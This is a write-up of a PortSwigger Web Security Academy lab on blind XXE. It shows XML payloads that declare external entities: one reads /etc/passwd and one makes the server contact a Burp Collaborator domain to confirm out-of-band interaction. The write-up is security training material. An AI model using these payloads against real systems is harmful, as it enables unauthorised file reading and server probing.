| Field | Value |
|---|---|
| Platform | PortSwigger Web Security Academy |
| Type | Blind XXE — Out-of-Band Detection |
| Difficulty | Practitioner |
| Objective | Trigger a DNS lookup and HTTP request to Burp Collaborator via XXE |
Blind XXE with Out-of-Band Interaction — Writeup¶
Initial Observation¶
Same stock check endpoint as the previous XXE labs — the request body is XML. But this time, whatever we put in productId doesn't come back in the response:
<?xml version="1.0" encoding="UTF-8"?>
<stockCheck><productId>teto</productId><storeId>teto</storeId></stockCheck>
Response: Invalid product ID
Trying the file retrieval payload from the previous lab to confirm nothing gets reflected:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE teto [ <!ENTITY miku SYSTEM "file:///etc/passwd">]>
<stockCheck><productId>&miku;</productId><storeId>1</storeId></stockCheck>
Still just Invalid product ID. The parser may or may not be resolving the entity — we can't tell from the response. This is blind XXE territory.
Attack Path¶
Out-of-Band Detection via Collaborator¶
Since nothing comes back in the response, we need to confirm the parser is resolving external entities through a side channel. Pointing the entity at a Burp Collaborator URL — if the parser fetches it, Collaborator will receive the DNS lookup and HTTP request:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE teto [ <!ENTITY miku SYSTEM "https://moexl8zvsrqt1zpv7uo0zmny0p6guaiz.oastify.com">]>
<stockCheck><productId>&miku;</productId><storeId>1</storeId></stockCheck>
Collaborator receives the interaction:
The parser resolved the external entity and the server made an outbound HTTP request to our Collaborator domain. Blind XXE confirmed — lab solved :P